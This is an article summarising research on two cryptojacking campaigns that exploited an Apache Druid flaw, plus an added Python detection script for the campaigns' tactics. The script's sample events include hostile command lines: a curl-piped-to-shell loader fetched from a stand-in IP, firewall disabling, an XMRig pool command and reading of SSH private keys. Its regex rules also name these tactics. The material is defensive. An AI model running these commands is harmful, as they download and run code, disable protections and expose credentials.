ARMO’s research team uncovered two cryptojacking campaigns targeting a deliberately exposed Kubernetes honeypot running Apache Druid, leveraging the known CVE-2021-25646 vulnerability for unauthenticated remote code execution. The first campaign, linked to the RUDEDEVIL/LUCIFER malware family, began with automated scans and DNS callbacks for exploit verification, followed by the deployment of XMRig miners and execution of bash scripts to optimize system resources and maintain persistence. The malware connected to Monero mining pools and exfiltrated logs, indicating a well-coordinated mining operation that had already compromised at least 26 systems and earned roughly 110 XMR.
The second campaign, attributed to the Sysrv botnet, used similar initial access via the same Druid vulnerability but leveraged different infrastructure and tooling, including a loader script (ldr.sh) and platform-specific binaries (sys.x86_64). Sysrv’s tactics included disabling firewalls, removing competing miners, enabling persistence, and preparing for lateral movement by collecting SSH keys. The botnet also contained embedded exploits for other platforms like Atlassian and Apache.
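The tactics summarized above for both campaigns (a downloaded loader script, firewall disabling, removal of competing miners, XMRig execution with mining-pool connections, SSH key collection) map directly onto behavioural detection rules over process and network telemetry from the cluster. The Python below is an added example written for this article, not ARMO's tooling or anything recovered from the campaigns: the event format, the sample events, the mining-pool port watchlist and every hostname and address in them are constructed. It escalates a pod only when several distinct indicators from the chain occur together, so a lone administrative iptables -F is reported but not treated as a compromise.

```python
"""Behavioural detection for the cryptojacking chain described in the article.

Added example (not ARMO's code). Events model a runtime-security feed such as
process-exec and outbound-connection records collected per pod; the records,
the pool-port watchlist and all hosts/addresses below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class ProcEvent:
    pod: str
    comm: str                       # process name as seen by the runtime sensor
    cmdline: str                    # full command line
    dest_port: Optional[int] = None  # outbound connection port, if the event has one


# Ports commonly used by stratum mining pools (assumed watchlist, tune per environment).
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}

# (rule name, tactic, predicate). Each rule corresponds to one step the article describes.
RULES: List[tuple] = [
    ("loader-pipe-to-shell", "Execution: remote script loader",
     lambda e: re.search(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", e.cmdline) is not None),
    ("firewall-disabled", "Defense evasion: host firewall disabled",
     lambda e: re.search(r"\bufw\s+disable\b|\biptables\s+-F\b|"
                         r"\bsystemctl\s+(stop|disable)\s+firewalld\b", e.cmdline) is not None),
    ("kill-competing-miners", "Defense evasion: competitor miners removed",
     lambda e: e.comm in ("pkill", "kill", "killall")
     and re.search(r"xmrig|miner", e.cmdline, re.I) is not None),
    ("xmrig-miner", "Impact: XMRig execution",
     lambda e: e.comm == "xmrig"
     or re.search(r"stratum\+tcp://|--donate-level", e.cmdline) is not None),
    ("mining-pool-port", "Command and control: mining pool connection",
     lambda e: e.dest_port in MINING_POOL_PORTS),
    ("ssh-key-harvest", "Credential access: SSH material read",
     lambda e: re.search(r"\.ssh/(id_[a-z0-9]+|known_hosts|authorized_keys)\b", e.cmdline) is not None),
]


def detect(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) match; every hit is kept for the analyst."""
    findings = []
    for e in events:
        for name, tactic, pred in RULES:
            if pred(e):
                findings.append({"pod": e.pod, "rule": name, "tactic": tactic, "cmdline": e.cmdline})
    return findings


def triage(findings: List[Dict[str, str]], min_distinct_rules: int = 2) -> Dict[str, List[str]]:
    """Escalate pods showing several distinct steps of the chain.

    Chaining cuts false positives: a single firewall flush or a single odd port
    stays a low-severity finding; a loader, a miner and a pool connection on the
    same pod is an incident.
    """
    by_pod: Dict[str, set] = {}
    for f in findings:
        by_pod.setdefault(f["pod"], set()).add(f["rule"])
    return {pod: sorted(rules) for pod, rules in by_pod.items() if len(rules) >= min_distinct_rules}


# Constructed telemetry: one pod reproducing the described chain, two benign pods.
SAMPLE_EVENTS = [
    ProcEvent("druid-0", "bash", "bash -c 'curl -s http://203.0.113.10/ldr.sh | sh'"),
    ProcEvent("druid-0", "ufw", "ufw disable"),
    ProcEvent("druid-0", "pkill", "pkill -9 -f xmrig"),
    ProcEvent("druid-0", "xmrig",
              "./xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER -k",
              dest_port=3333),
    ProcEvent("druid-0", "cat", "cat /root/.ssh/id_rsa /root/.ssh/known_hosts"),
    ProcEvent("web-1", "iptables", "iptables -F"),                       # lone admin action
    ProcEvent("api-2", "curl", "curl -s https://api.example.invalid/health", dest_port=443),
]


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h['pod']}] {h['rule']:<22} {h['tactic']}")
    print("escalated:", triage(hits))
```

Feeding the same rules real sensor output (Falco, Tetragon or audit-based exec logging) is a matter of mapping their fields onto ProcEvent; the port watchlist and process-name lists are the parts most worth tuning to the workload.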